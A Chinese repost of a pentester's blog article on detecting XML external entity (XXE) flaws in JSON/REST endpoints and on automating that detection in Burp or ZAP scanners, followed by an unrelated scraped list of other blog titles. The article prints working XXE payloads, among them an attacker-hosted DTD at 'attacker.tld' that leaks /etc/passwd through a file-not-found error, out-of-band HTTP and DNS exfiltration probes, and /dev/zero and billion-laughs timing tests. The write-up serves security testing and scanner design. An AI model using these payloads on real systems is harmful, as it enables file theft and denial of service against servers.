参考连接:https://www.christian-schneider.net/GenericXxeDetection.html

In this article I present some thoughts about generic detection of XML eXternal Entity (XXE) vulnerabilities during manual pentests supplemented with some level of automated tests. The ideas in this blog post (derived from experiences of several typical and untypical XXE detections during blackbox pentests) can easily be transformed into a generic approach to fit into web vulnerability scanners and their extensions.

This is done by demonstrating an example of where service endpoints that are used in a non-XML fashion can eventually be accessed with XML as input format too, opening the attack surface for XXE attacks.

At the time of writing this article I've started to develop a Burp Extension ("Generic XXE Detector") and will eventually also transform it into a ZAP extension, letting this kind of detection approach make its way into these scanners - if I find the time to complete that.

XXE detection in service endpoints

During blackbox pentesting one often gets in front of some service endpoints (mostly REST based ones used from within single-page apps in browsers). These RESTful endpoints often offer JSON as transport format, but many server-side development frameworks (like JAX-RS for Java based RESTful services) make it very easy for developers to offer also an XML based data exchange format for input and/or output out-of-the-box. If such alternative formats exist, they can easily be triggered using proper Content-Type request header values (like text/xml or application/xml).

So the challenge is to find these endpoints which also accept XML as input format, even though the client (webpage) only uses JSON or direct path- or query-params to access the service. To scale this from a manual pentesting trick into a way of automation, the tool to scan for this needs a generic XXE detection approach, which can easily be applied to every URL the active scanner sees in its scope during a pentest.

In one very interesting case of an XXE finding inside a Java based service endpoint (during a blackbox pentest) I came across a service endpoint that only had path- and query-params as input source and responded with JSON. Basically it was even a simple GET based service (no POST there). So this didn't really look much like "let's try some XXE Kung-Fu here...". Especially the tools including Burp didn't find any XXE at this spot when actively scanning it (even with thorough scanning configured).

But after several manual tries, I managed to squeeze an XXE out of it, since it indeed was a REST service which also accepted XML out-of-the-box. I had to apply several tricks though, in order to get the XXE to work:

  • I tried to convert the request from a GET to a POST in order to also send XML as the request body. Unfortunately POST was not accepted (as the service was only mapped to GET), so I had to stick to GET requests.
  • I removed the query-params as well as path-params from the request URL in order to not let these get picked up by the service. As this was a blackbox pentest, I can only assume that removing the query-params led towards a mode of the service endpoint accepting the input also via other formats (i.e. when automatically mapped from XML input for example). Accessing the service without the used path- and query-params resulted in an error message (no input data available).
  • Even though only GET could be used, I then added the Content-Type: application/xml request header and some non-conforming invalid XML as the request body: This was rewarded with an XML error message, showing that some kind of parsing process picked up the body payload of the GET request, i.e. making it an interesting target to investigate further. Adding the path- and query-params back to the request resulted in a business error message, so that the exploit seems to require to remove them, as they might take precedence over the XML body otherwise.

As I then had a way of letting the server parse my XML and received at least replies with some technical error messages from the parser, I tried to use the XXE to exfiltrate some data (like /etc/passwd or just listing of base directory /): As the expected XML format for this kind of service call was not known to me (blackbox assessment), I had to use a more generic approach, which works even without placing the entity reference in the proper XML element. Also (as tested afterwards) when the server got the XML as expected, it didn't return any dynamic response, so only the technical error was echoed back. Of course the great out-of-band (OOB) exfiltration technique by T.Yunusov and A.Osipov would work as a generic approach to exfiltrate content in such a scenario.

But since (at least for current Java environments) this kind of URL-based OOB exfiltration only allowed to exfiltrate contents of files consisting of only one line (as CRLFs break the URL to the attacker's server), I managed to combine it with the technical error message the server replied and read the data from there:

  • The idea is to use the trick of passing the data carrying parameter entity itself into another file:/// entity in order to trigger a file-not-found exception on the second file access with the content of the first file as the name of the second file, which was thankfully echoed back completely from the server as a file-not-found exception (so pure OOB exfiltration wasn't required here):

Attacker's DTD part applying a file-not-found exception echo trick (hosted on attacker's server at http://attacker.tld/dtd-part):

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

Request (exploiting the XXE like in the regular OOB technique by Yunusov & Osipov):

GET /service/ HTTP/1.1
Host: example.com:443
Content-Type: application/xml
Content-Length: 161 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

Response (delivering the data as file-not-found error message):

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 1851
Connection: close javax.xml.bind.UnmarshalException
- with linked exception:
[java.io.FileNotFoundException: /root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
... ... ...
... ... ...
... ... ...
apache:x:54:54:Apache:/var/www:/sbin/nologin (No such file or directory)]

Using this file-not-found exception echo trick to read the data not only solved the "one line only" exfiltration problem, it also lifted some restrictions that existed with XXE exploitations when used directly inside the XML elements: Contents of files that contain XML special meta chars (like < or >) would break the XML structure. This is no longer a problem with the above mentioned trick.

After that all worked pretty well, I discovered that Ivan Novikov has recently blogged about some pure OOB techniques that even exfiltrate data under Java 1.7+ using the ftp:// scheme and a customized FTP server. This would have worked in the above mentioned scenario as well - even when the server does not return technical error messages, as it is a pure OOB exfiltration trick.

As a small side note: This file-not-found exception echo trick might also be used as an XSS in some cases by trying to echo <script>alert(1)</script> as the filename. Often these technical error messages might not be properly escaped when echoed back, compared to situations where non-error-messages originating from regular XML element input will be reflected. But this XSS is rather difficult to exploit in real scenarios, since it would not be easy to trigger the desired request from a victim's browser – if not even impossible depending on the http method (in this example a strange GET with request body).

Automating this as a scanning approach

Finding such an XXE vulnerability in a service endpoint using only manual pentesting tricks (as the scanners didn't detect it) made me think of a generic approach that is capable of detecting such a vulnerability automatically. Basically the scanning technique should try this on every (in-scope) request it sees, even when the request in question does not contain any XML data (as in the scenario of the RESTful service above that used mainly JSON).

So here are the ideas I came up with (which I will also prototype as a Burp and/or ZAP extension soon). The scanner should perform the following steps on every request it is allowed to scan actively. This should be done in addition to any regular XXE detections the scanner already has in place. The following technique is just intended to detect scenarios like the above mentioned:

  1. Issue the request with original path- and/or query-params and with the http POST method as well as its original http method (even GET) and place a generic DTD based payload in the request body that directly references the parameter entity, like the following: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///some-non-existing.file" > %xxe; ]>. Don't forget to add the Content-Type: application/xml header to the request (also try with text/xml as well).

    • If the response contains an error like the following (effectively echoing the filename back in some kind of file-not-found message), flag it as potential XXE: javax.xml.bind.UnmarshalException - with linked exception: [java.io.FileNotFoundException: /some-non-existing.file (No such file or directory)]
    • You can also compare the response content of the previous step of accessing a non-existing file with accessing a valid existing file like /etc/passwd. This might catch some differences between the error responses of non-existing files vs. existing files that do not contain valid content to place inside the DTD.
    • If it is also possible to echo in the file-not-found exception message some <script>alert(1)</script> as the filename, flag it as XSS too, but one that is difficult to exploit (and depending on the http method required eventually impossible to exploit).
  2. If the steps above didn't trigger an XXE condition, try to remove the original request's query-params and try the above steps again. Finally try to strip each path-param as well (just in case the service is picking this up also and then does not try to access input from the XML body instead) and retry step one.
  3. If the steps above didn't trigger an XXE condition, try to use the well-known OOB techniques (see the referenced links above for more details regarding these cool tricks):
    • Use a payload like the following (still having the Content-Type header set to application/xml): <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://attacker.tld/xxe/ReqNo" > %xxe; ]>, where ReqNo is replaced by a unique number for every request scanned. This unique number is required (when parsing the attacker's webserver logs) to correlate log entries with the scanned requests that should then be flagged as XXE candidates. The best results would be gained if the scanner offers some kind of drop-in where (at the end of the pentesting assignment) the observed webserver logs (of the attacker's webserver) can be given to the scanning engine for checking against the issued OOB request numbers for matches.
  4. If the steps above didn't trigger an XXE condition (eventually because the server cannot access the attacker's webserver), try to use established DNS-based OOB exfiltration techniques, where part of the domain name contains the XXE request number ReqNo from the previous step, like in the following payload: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://ReqNo.xxe.attacker.tld" > %xxe; ]>. That way at least the DNS resolution to the attacker's domain via its DNS server might be used to trigger the XXE match when after the pentest the logs of the DNS server are parsed by the scanner to correlate them with the scanned requests.
  5. If the steps above didn't trigger an XXE condition, we have to go completely blind only on sidechannels like timing measurements: This could be done by checking various internally reachable ports while measuring the response time of the payload <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]> versus the response time of <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://127.0.0.1:9876" > %xxe; ]>
    • Similar checks can be performed with file:/// URLs by accessing small vs. big files. When being a risky scanner, you can try to measure the increase in response time when accessing /dev/zero as the file (eventually killing the thread on the server).
    • Also a risky scanner can try to measure the processing time of nested (non-external) expansions like in the "billion laughs attack".

Note that in the above scenarios the concrete XML format does not need to be known to the scanner, so it can easily apply this scanning technique on requests even when they haven't used any XML during passive observations. All XML payloads are completely self-contained within the DTD section. The idea is to issue this kind of scan on every request to automatically identify places where service endpoints or alike also offer to be accessed using XML, as is the case with some RESTful development frameworks.

Some of the XML DTD payloads above (those using the OOB requests to detect XXE either by inspecting the attacker's webserver logs or measuring the timing differences) can even be shortened to a pure external DTD approach like this: <!DOCTYPE test SYSTEM "http://attacker.tld/xxe/ReqNo"> or <!DOCTYPE test SYSTEM "file:///dev/zero">. But the longer tests presented above give more confidence to the XXE finding, since the shorter version only validates that external DTDs and not entities can be loaded.

Conclusion

As a Pentester
Watch out for any service-like endpoints in the application to pentest and try to force them to accept XML, even when the usage of these endpoints from within the application utilizes other kinds of input formats (like query- or path-params or JSON post bodies). In a lucky case where the endpoint is also configured to accept XML, try to further exploit this as an XXE condition.
As a Scanner Vendor
Try to incorporate ideas like the steps presented in this article into your scanning engines augmenting them with automated parsing of log files to ease generic XXE detection with OOB techniques, even when scanning large attack surfaces (and make the attacker's exfiltration URL configurable).

Generic XXE Detection的更多相关文章

  1. 论文学习-深度学习目标检测2014至201901综述-Deep Learning for Generic Object Detection A Survey

    目录 写在前面 目标检测任务与挑战 目标检测方法汇总 基础子问题 基于DCNN的特征表示 主干网络(network backbone) Methods For Improving Object Rep ...

  2. nginx配合modsecurity实现WAF功能

    一.准备工作 系统:centos 7.2 64位.nginx1.10.2, modsecurity2.9.1 owasp3.0 1.nginx:http://nginx.org/download/ng ...

  3. 如何使用event 10049分析定位library cache lock and library cache pin

    Oracle Library Cache 的 lock 与 pin 说明 一. 相关的基本概念 之前整理了一篇blog,讲了Library Cache 的机制,参考: Oracle Library c ...

  4. R-CNN论文翻译

    R-CNN论文翻译 Rich feature hierarchies for accurate object detection and semantic segmentation 用于精确物体定位和 ...

  5. OpenCV特征点提取----Fast特征

    1.FAST(featuresfrom accelerated segment test)算法 http://blog.csdn.net/yang_xian521/article/details/74 ...

  6. ICCV2013、CVPR2013、ECCV2013目标检测相关论文

    CVPapers 网址: http://www.cvpapers.com/   ICCV2013 Papers about Object Detection: 1. Regionlets for Ge ...

  7. Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition

    Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition Kaiming He, Xiangyu Zh ...

  8. zz深度学习目标检测2014至201901综述

    论文学习-深度学习目标检测2014至201901综述-Deep Learning for Generic Object Detection A Survey  发表于 2019-02-14 |  更新 ...

  9. (转载) AutoML 与轻量模型大列表

    作者:guan-yuan 项目地址:awesome-AutoML-and-Lightweight-Models 博客地址:http://www.lib4dev.in/info/guan-yuan/aw ...

随机推荐

  1. Docker中如何删除image(镜像)

    原文地址:http://yaxin-cn.github.io/Docker/how-to-delete-a-docker-image.html docker中删除images的命令是docker rm ...

  2. 【SPOJ10707】COT2 - Count on a tree II

    题目大意:给定一棵 N 个节点的无根树,每个节点有一个颜色.现有 M 个询问,每次询问一条树链上的不同颜色数. 题解:学会了树上莫队. 树上莫队是将节点按照欧拉序进行排序,将树上问题转化成序列上的问题 ...

  3. render_template 网页模板

    模板简单介绍: 视图函数:视图函数就是装饰器所装饰的方法,视图函数的主要作用是生成请求的响应,这是最简单的请求.实际上,视图函数有两个作用:处理业务逻辑和返回响应内容.在大型应用中,把业务逻辑和表现内 ...

  4. Java 多线程篇

    先举个例子 计算机的核心是CPU,它承担了计算机所有计算任务,可以把它理解为像一个工厂,时刻在运行. 假定工厂有一个电力系统,工厂有很多车间,一次只能供给一个车间使用,也就是说一个车间开工的时候,其他 ...

  5. python操作excel文件一(xlrd读取文件)

    一般做接口测试,会把参数和一些数据放入excel表中,这样就不会重新编译代码,提高效率.一般如何操作呢?接下来跟着步骤一起学习吧 执行步骤: 1.首先要安装 xlrd这个模块,用 pip instal ...

  6. C regex.h

    C也是存在正则表达式的 Linux下regex.h知识点和使用样例 上文中有一个样例代码,进行了测试 总结一下有些注意点: 1.上述代码的匹配子串很奇怪,为什么会出现 cnt= a very cnt= ...

  7. 洛谷 P1879 玉米田(状压DP入门题)

    传送门 https://www.cnblogs.com/violet-acmer/p/9852294.html 题解: 相关变量解释: int M,N; int plant[maxn][maxn];/ ...

  8. JavaBean+Servlet 开发时,JavaBean 编写问题

    在开发 JavaBean 时,遇见一个问题: *****  表单字段为空,提交时出现 nullPointerException 异常:  表单字段不为空,提交正常. 使用 JavaBean ,JSP页 ...

  9. BeautifulSoup获取图片

    参看文档:https://www.cnblogs.com/forever-snow/p/8506746.html

  10. 100.Same Tree(E)

    100. same tree 100. Same Tree Given two binary trees, write a function to check if they are the same ...